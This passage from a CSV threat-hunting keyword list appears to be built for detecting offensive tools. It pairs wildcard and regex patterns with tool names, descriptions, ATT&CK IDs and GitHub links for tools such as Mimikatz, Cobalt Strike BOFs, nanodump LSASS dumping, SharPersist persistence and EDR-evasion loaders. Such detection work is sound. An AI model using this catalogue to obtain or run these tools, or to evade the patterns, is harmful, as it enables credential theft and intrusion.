pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" 
"*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Import-Module *Microsoft.ActiveDirectory.Management.dll*",".{0,1000}Import\-Module\s.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","0","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*Import-Module DSInternals*",".{0,1000}Import\-Module\sDSInternals.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" 
"*improsec/SharpEventPersist*",".{0,1000}improsec\/SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*In medium integrity but user is a local administrator- UAC can be bypassed*",".{0,1000}In\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*In memory of all those murdered in the Nova party massacre 7.10.2023*",".{0,1000}In\smemory\sof\sall\sthose\smurdered\sin\sthe\sNova\sparty\smassacre\s7\.10\.2023.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*Inactive Domain Admins Honey Tokens*",".{0,1000}Inactive\sDomain\sAdmins\sHoney\sTokens.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*inceptor*POWERSHELL*",".{0,1000}inceptor.{0,1000}POWERSHELL.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*inceptor.py *",".{0,1000}inceptor\.py\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*inceptor/obfuscators*",".{0,1000}inceptor\/obfuscators.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" 
"*inceptor-main.zip*",".{0,1000}inceptor\-main\.zip.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*include ""MSFRottenPotato.h""*",".{0,1000}include\s\""MSFRottenPotato\.h\"".{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*include ""prefetch_leak.h""*",".{0,1000}include\s\""prefetch_leak\.h\"".{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*include ""ThrowbackDLL.h""*",".{0,1000}include\s\""ThrowbackDLL\.h\"".{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*include *Nidhogg.hpp*",".{0,1000}include\s.{0,1000}Nidhogg\.hpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - 
T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*include beacon.h*",".{0,1000}include\sbeacon\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*include injection.c*",".{0,1000}include\sinjection\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*include*bofmask.h*",".{0,1000}include.{0,1000}bofmask\.h.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","2","100","23","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*incognito* list_tokens -u*",".{0,1000}incognito.{0,1000}\slist_tokens\s\-u.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*incognito.exe*",".{0,1000}incognito\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*infection_monkey.py*",".{0,1000}infection_monkey\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*InflativeLoading.py *",".{0,1000}InflativeLoading\.py\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*InflativeLoading-DumpPEFromMemory*",".{0,1000}InflativeLoading\-DumpPEFromMemory.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*INFO: Adding keepass backdoor persistence*",".{0,1000}INFO\:\sAdding\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding registry persistence*",".{0,1000}INFO\:\sAdding\sregistry\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding scheduled task backdoor persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding scheduled task persistence*",".{0,1000}INFO\:\sAdding\sscheduled\stask\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding service persistence*",".{0,1000}INFO\:\sAdding\sservice\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - 
T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding startup folder persistence*",".{0,1000}INFO\:\sAdding\sstartup\sfolder\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Adding tortoise svn persistence*",".{0,1000}INFO\:\sAdding\stortoise\ssvn\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Checking backdoor present in KeePass config file*",".{0,1000}INFO\:\sChecking\sbackdoor\spresent\sin\sKeePass\sconfig\sfile.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*INFO: Listing all scheduled tasks available to backdoor.*",".{0,1000}INFO\:\sListing\sall\sscheduled\stasks\savailable\sto\sbackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" 
"*info@skelsecprojects.com*",".{0,1000}info\@skelsecprojects\.com.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*info@tor2web.org*",".{0,1000}info\@tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*infoga.py -*",".{0,1000}infoga\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*information_gathering_tools.py*",".{0,1000}information_gathering_tools\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*infosecn1nja/SharpDoor*",".{0,1000}infosecn1nja\/SharpDoor.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" 
"*infosecn1nja/SharpDoor*",".{0,1000}infosecn1nja\/SharpDoor.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*Initial_Access.ps1*",".{0,1000}Initial_Access\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*",".{0,1000}InitialAccess_SpearphishingAttachment_FakeWordDoc\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*InitialAccess_SpearphishingAttachment_Windows.py*",".{0,1000}InitialAccess_SpearphishingAttachment_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes 
the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Initialised lsarelayx*",".{0,1000}Initialised\slsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*initialize_fake_thread_state*",".{0,1000}initialize_fake_thread_state.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*initialize_spoofed_callstack*",".{0,1000}initialize_spoofed_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*initializeShellcodeFluctuation*",".{0,1000}initializeShellcodeFluctuation.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*Initializing domainDumper()*",".{0,1000}Initializing\sdomainDumper\(\).{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*initstring/cloud_enum*",".{0,1000}initstring\/cloud_enum.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*inject 1337 /*",".{0,1000}inject\s1337\s\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Inject shellcode on the server.\\nUsage: inject*",".{0,1000}Inject\sshellcode\son\sthe\sserver\.\\\\nUsage\:\sinject.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*inject 